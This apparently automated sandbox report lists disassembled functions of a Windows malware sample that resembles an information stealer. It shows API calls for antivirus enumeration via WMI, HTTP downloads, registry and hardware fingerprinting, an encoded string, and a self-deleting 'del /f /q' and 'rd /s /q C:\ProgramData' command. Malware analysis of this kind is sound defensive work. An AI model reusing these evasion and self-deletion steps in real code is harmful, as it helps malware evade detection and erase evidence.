                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                            • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                            • API String ID: 2456697202-461178377
                                                                            • Opcode ID: 4c5c30e2ea9d2adf16a85c0074a720322db174524018e3eb54dc317dc257ee69
                                                                            • Instruction ID: 4b36eb2a1d5a1bedc29b67d6ed82d78b3e43d11d07795a3f045295924e426f07
                                                                            • Opcode Fuzzy Hash: 4c5c30e2ea9d2adf16a85c0074a720322db174524018e3eb54dc317dc257ee69
                                                                            • Instruction Fuzzy Hash: 63516C71A01228BBCB20DB95DC49EEFBB7CEF49B10F504116F515E6190C7B89A41CBA8
                                                                            Function 004118AE Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004118B3
                                                                            • strtok_s.MSVCRT ref: 004118E4
                                                                            • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041197C
                                                                              • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                              • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                            • lstrcpy.KERNEL32(?,?), ref: 00411A33
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00411A6F
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00411AB6
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00411AFD
                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00411B44
                                                                            • strtok_s.MSVCRT ref: 00411CA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                            • String ID: false$true
                                                                            • API String ID: 49562497-2658103896
                                                                            • Opcode ID: 59e9e0ed7abd9e5132589874edf6417603bdd11e833da19a679df8b697dbdabf
                                                                            • Instruction ID: ba927b6fbe385cdc95ceeb1740fcb97b1cf008379e2e115a61cc2516e6170599
                                                                            • Opcode Fuzzy Hash: 59e9e0ed7abd9e5132589874edf6417603bdd11e833da19a679df8b697dbdabf
                                                                            • Instruction Fuzzy Hash: B6C182B190021DAFDF10EFE4D855EDE77B9AF18304F10446AF505A3191DF78AA89CB64
                                                                            Function 00404F2A Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00404F2F
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
                                                                            • InternetCloseHandle.WININET(00000000), ref: 004050DD
                                                                            • InternetCloseHandle.WININET(?), ref: 004050E6
                                                                            • InternetCloseHandle.WININET(?), ref: 004050EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                            • String ID: ERROR$ERROR$GET
                                                                            • API String ID: 2435781452-2509457195
                                                                            • Opcode ID: 517f34d15c50c2bff24b9ad49d7a6df4359f1629075331d26f3e055988320fb2
                                                                            • Instruction ID: c1fd0c265216fd47394e40449a31f27cb744319a2eff906596a5c238740c7f68
                                                                            • Opcode Fuzzy Hash: 517f34d15c50c2bff24b9ad49d7a6df4359f1629075331d26f3e055988320fb2
                                                                            • Instruction Fuzzy Hash: 93512F71900119AFEB11EBE0DC85FEFBBB9EB09744F10403AF605B2191DB795A48CBA5
                                                                            Function 004041B2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170networkmemoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004041B7
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                            • InternetCloseHandle.WININET(?), ref: 00404372
                                                                            • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                            • String ID: GET
                                                                            • API String ID: 1687531150-1805413626
                                                                            • Opcode ID: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                            • Instruction ID: 7ce3078965428967d931fab95435fba2e2eaf60a30af71eeb75a30b69647e977
                                                                            • Opcode Fuzzy Hash: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                            • Instruction Fuzzy Hash: 07516DB2900219AFDB10EFE0CC85AEEBBB9EB49344F00513AFA01B2190D7785E45CB65
                                                                            Function 004136E3 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004136E8
                                                                            • memset.MSVCRT ref: 00413708
                                                                            • memset.MSVCRT ref: 00413714
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00413729
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004138B5
                                                                            • memset.MSVCRT ref: 004138C2
                                                                            • memset.MSVCRT ref: 004138D0
                                                                            • ExitProcess.KERNEL32 ref: 004138E1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                            • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                            • API String ID: 1312519015-206210831
                                                                            • Opcode ID: b60e4181e6a310db5da8c1337dc0a9af3d85a3d6be454d84c97edfaf10444dd9
                                                                            • Instruction ID: f7fb810ff7d1253c450dda7b52a61bb1d28e29dbb724758fa3153a55c7d62ffe
                                                                            • Opcode Fuzzy Hash: b60e4181e6a310db5da8c1337dc0a9af3d85a3d6be454d84c97edfaf10444dd9
                                                                            • Instruction Fuzzy Hash: 24513EB1D0424DEEDB11EBE5C992ADEBBB8AF18304F50017EE105B3582DB785B48CB65
                                                                            Function 00410925 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 125comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0041092A
                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?,00000000), ref: 00410942
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                            • CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?), ref: 0041096D
                                                                            • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                            • VariantInit.OLEAUT32(?), ref: 004109F6
                                                                              • Part of subcall function 00410C8D: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1D,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000), ref: 00410C95
                                                                              • Part of subcall function 00410C8D: CharToOemW.USER32(?,00000000), ref: 00410CA1
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • VariantClear.OLEAUT32(?), ref: 00410A2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                            • API String ID: 3694693100-315474579
                                                                            • Opcode ID: 37c255ede78dc96a955b53c0c79ddd89c62703064e8d35959ae560dff953bc09
                                                                            • Instruction ID: 31939d6998afadb2a5dbf95c0d2b4f071c2bc660873cc242f14b71194dd59c4b
                                                                            • Opcode Fuzzy Hash: 37c255ede78dc96a955b53c0c79ddd89c62703064e8d35959ae560dff953bc09
                                                                            • Instruction Fuzzy Hash: 5B418E70A01229BBCB20DB95DD49EEF7F78EF49B60F60411AF115A6180C7B85A41CBA8
                                                                            Function 00410071 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00410076
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                            • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                            • wsprintfA.USER32 ref: 00410132
                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                            • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                            • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                            • String ID: - $%s\%s$?
                                                                            • API String ID: 404191982-3278919252
                                                                            • Opcode ID: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                            • Instruction ID: e683f53884952fc8e4340679726e39bda7e6eb295b9d2e7bf921829342b6fcae
                                                                            • Opcode Fuzzy Hash: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                            • Instruction Fuzzy Hash: 177113B190021DEEDF11EFE1DD84EEEBBB9BB18304F10417AE905B2151DB785A88CB64
                                                                            Function 0040F689 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040F68E
                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6A4
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F6C6
                                                                            • memset.MSVCRT ref: 0040F708
                                                                            • ??_V@YAXPAX@Z.MSVCRT ref: 0040F841
                                                                              • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                              • Part of subcall function 0040DD10: memcpy.MSVCRT ref: 0040DD30
                                                                            Strings
                                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F720, 0040F809
                                                                            • N0ZWFt, xrefs: 0040F7AB, 0040F7B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                            • API String ID: 3050127167-1622206642
                                                                            • Opcode ID: 62cac7f763dcb1ecf59ba7468d4914cb1836e5842510e83f1bd36acc244ddd33
                                                                            • Instruction ID: 5386366d5d033f49441d76ecd0ffc2bd1dc3d668faeba3ff857dabf4a36879bb
                                                                            • Opcode Fuzzy Hash: 62cac7f763dcb1ecf59ba7468d4914cb1836e5842510e83f1bd36acc244ddd33
                                                                            • Instruction Fuzzy Hash: 7A517C71900219AEDB20EB94DC81AEEBBB9EF04314F20007EF114B66C1DB795E88CB59
                                                                            Function 004104DD Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004104E2
                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                            • wsprintfA.USER32 ref: 004105AD
                                                                            • lstrcat.KERNEL32(00000000,00426248), ref: 004105BC
                                                                              • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                            • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                              • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                              • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                            • String ID: :\$C
                                                                            • API String ID: 688099012-3309953409
                                                                            • Opcode ID: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
                                                                            • Instruction ID: 31ba2aefab9431e017bcb41f2bdcd0be11d417c1f72aa959c07d5e8bae5074a4
                                                                            • Opcode Fuzzy Hash: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
